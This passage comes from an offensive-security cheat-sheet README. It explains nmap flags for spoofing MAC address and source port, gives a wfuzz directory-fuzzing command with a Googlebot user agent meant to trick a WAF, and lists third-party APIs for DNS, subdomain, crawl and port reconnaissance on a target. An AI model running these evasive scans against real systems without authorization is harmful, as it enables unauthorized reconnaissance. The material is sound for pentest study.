446 | -T3                      :: Timing template set to polite.
447 | --spoof-mac=google       :: Spoof MAC address.
448 | -g443                    :: Spoof source port number.
449 | --script="not intrusive" :: Loads every script except for those in the intrusive category.
450 | -oN                      :: Output the results to a file named resultados.txt
451 | ```
452 | 
453 | <br>
454 | 
455 | ## wFuzz ([man](https://www.kali.org/tools/wfuzz/))
456 | - wFuzz is a web application [fuzzing](https://owasp.org/www-community/Fuzzing) tool. <br>
457 | 
458 | <br>
459 | 
460 | ###  Ultimate wFuzz command v1 <br>
461 | - You can find awesome wordlists [here](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content)
462 | 
463 | ```sh
464 | sudo wfuzz --hc 404,400,302,301 -u https://site.com/FUZZ -w WORDLIST.txt -H "User-Agent: Googlebot-News" -t 50
465 | ```
466 | 
467 | ### Explanation:
468 | ```markdown
469 | --hc                     :: Ignore 404, 400, 302 and 301 status codes.
470 | -u                       :: Url with the FUZZ param where the program shall do the fuzzing.
471 | -w                       :: Using a wordlist.
472 | -H                       :: Trying to trick the WAF with a Google-bot user agent.
473 | -t                       :: Using 50 threads.
474 | ```
475 | 
476 | <br>
477 | 
478 | <hr>
479 | 
480 | <br>
481 | 
482 | # - APIs
483 | - APIs for a variety of target reconnaissance!
484 | - Tip: Can be used with cURL to make automated tools using shell/bash script.
485 | - Replace **URL.COM** with your target's domain.
486 | 
487 | The purpose of an API(Application Programming Interface) is to facilitate communication between software. They provide a format for applications and devices to talk to one another and exchange data in response to commands. This Request/Response pair is a fundamental component in an API
488 | 
489 | <img src="./assets/api-example.jpg" alt="API Visual Example">
490 | 
491 | <br>
492 | 
493 | ## DNS Look up & DNS Stuff <br>
494 | 
495 | > https://api.hackertarget.com/dnslookup/?q=URL.COM <br>
496 | > https://api.threatminer.org/v2/domain.php?q=URL.COM&rt=5 <br>
497 | > https://api.hackertarget.com/findshareddns/?q=URL.COM <br>
498 | > https://api.hackertarget.com/reversedns/?q=URL.COM <br>
499 | > https://api.hackertarget.com/zonetransfer/?q=URL.COM <br>
500 | > https://dns.google.com/resolve?name=URL.com&type= (TXT,MX,AAAA,A,CNAME,NS,SOA,PTR,SPF,SRV... etc)
501 | 
502 | <br>
503 | 
504 | ## General Network <br>
505 | 
506 | > https://api.hackertarget.com/subnetcalc/?q=URL.COM <br>
507 | 
508 | <br>
509 | 
510 | ## HTTP Headers <br>
511 | 
512 | > https://api.hackertarget.com/httpheaders/?q=URL.COM
513 | 
514 | <br>
515 | 
516 | ## Sub-domain Gathering <br>
517 | 
518 | > https://api.hackertarget.com/hostsearch/?q=URL.COM <br>
519 | > https://sonar.omnisint.io/subdomains/URL.COM <br>
520 | > https://jldc.me/anubis/subdomains/URL.COM <br>
521 | > https://riddler.io/search/exportcsv?q=pld:URL.com
522 | 
523 | <br>
524 | 
525 | ## Crawlers <br>
526 | - Alien Vault limit parameter can be set to any integer number,
527 | - as well as the page parameter.
528 | - Common Crawl outputs with json format.
529 | 
530 | > https://otx.alienvault.com/api/v1/indicators/hostname/URL.COM/url_list?limit=50&page=1 <br>
531 | > https://index.commoncrawl.org/CC-MAIN-2021-43-index?url=URL.COM&output=json
532 | 
533 | <br>
534 | 
535 | ## Scanners Related <br>
536 | 
537 | > https://api.hackertarget.com/nmap/?q=URL.COM <br>
538 | > https://urlscan.io/api/v1/search/?q=domain:URL.COM&size=10000
539 | 
540 | <br>
541 | <br>
542 | <br>
543 | <br>
544 | <hr>
545 | 
546 | 
547 | #### Credits: <br>
548 | 
549 | > [NobodyKnows](https://github.com/almostfamous2) :: Base creator of the [Nmap command](#nmap-ultimate-scan-v1-man)
550 | 
551 | > [Me](https://github.com/rodricbr)               :: Making it look cool & easy! :)
552 | 
553 | 
554 | 


--------------------------------------------------------------------------------
/assets/api-example.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RodricBr/OffSec-MISC/e174ddede11d62e40ba13152afa55ed0a337bd26/assets/api-example.jpg


--------------------------------------------------------------------------------
/assets/deserialization-diagram.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RodricBr/OffSec-MISC/e174ddede11d62e40ba13152afa55ed0a337bd26/assets/deserialization-diagram.jpg


--------------------------------------------------------------------------------
/assets/forbidden.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RodricBr/OffSec-MISC/e174ddede11d62e40ba13152afa55ed0a337bd26/assets/forbidden.png


--------------------------------------------------------------------------------
/assets/sqli-example.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RodricBr/OffSec-MISC/e174ddede11d62e40ba13152afa55ed0a337bd26/assets/sqli-example.png


--------------------------------------------------------------------------------
/assets/xss-example.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RodricBr/OffSec-MISC/e174ddede11d62e40ba13152afa55ed0a337bd26/assets/xss-example.png


--------------------------------------------------------------------------------